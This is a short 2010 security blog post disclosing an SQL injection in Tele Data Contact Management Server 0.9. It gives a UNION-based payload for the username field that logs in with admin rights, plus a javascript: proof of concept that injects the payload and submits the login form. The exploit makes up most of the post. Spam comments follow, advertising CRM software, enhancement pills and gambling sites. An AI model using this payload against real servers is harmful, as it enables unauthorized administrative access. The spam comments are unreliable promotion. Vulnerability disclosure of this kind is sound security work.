This site is soon to be deprecated by http://www.johnleitch.net

Wednesday, April 28, 2010

Tele Data Contact Management Server 0.9 SQL Injection

Tele Data Contact Management Server doesn't have much in the way of security. It's possible to log in with admin privileges by injecting SQL into the username field. As there are client side length constraints in place for the username field I packaged the exploit in some javascript for ease of use.

Exploit: or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--

PoC: javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();
Posted by John Leitch at 2:29 PM
Labels: , , ,

3 comments:

  1. CRM ParkerMay 4, 2010 at 5:45 AM

    CRM .The Easy CRM Software for Outlook. Prophet simplifies contact management software, contact manager, small business Sales CRM Software. Prophet is the easiest CRM software because it is built INTO Outlook vs simply synching with Outlook.

    ReplyDelete
  2. tungNovember 11, 2011 at 9:32 PM

    not bad ^^



    _________________
    Nachhilfe Mathematik Berlinnatural male enhancement pills

    ReplyDelete
  3. cragro.com/바카라March 6, 2022 at 1:24 AM

    Betting professionals who want to use Sports Toto are encouraged to have a regular game review process. If you learn to know how Toto works by referring to the reviews of good regulators, you will be able to get a good position on betting sports as a permanent player. 토토사이트 사이트 방문 안전놀이터

    ReplyDelete

Subscribe to: Post Comments (Atom)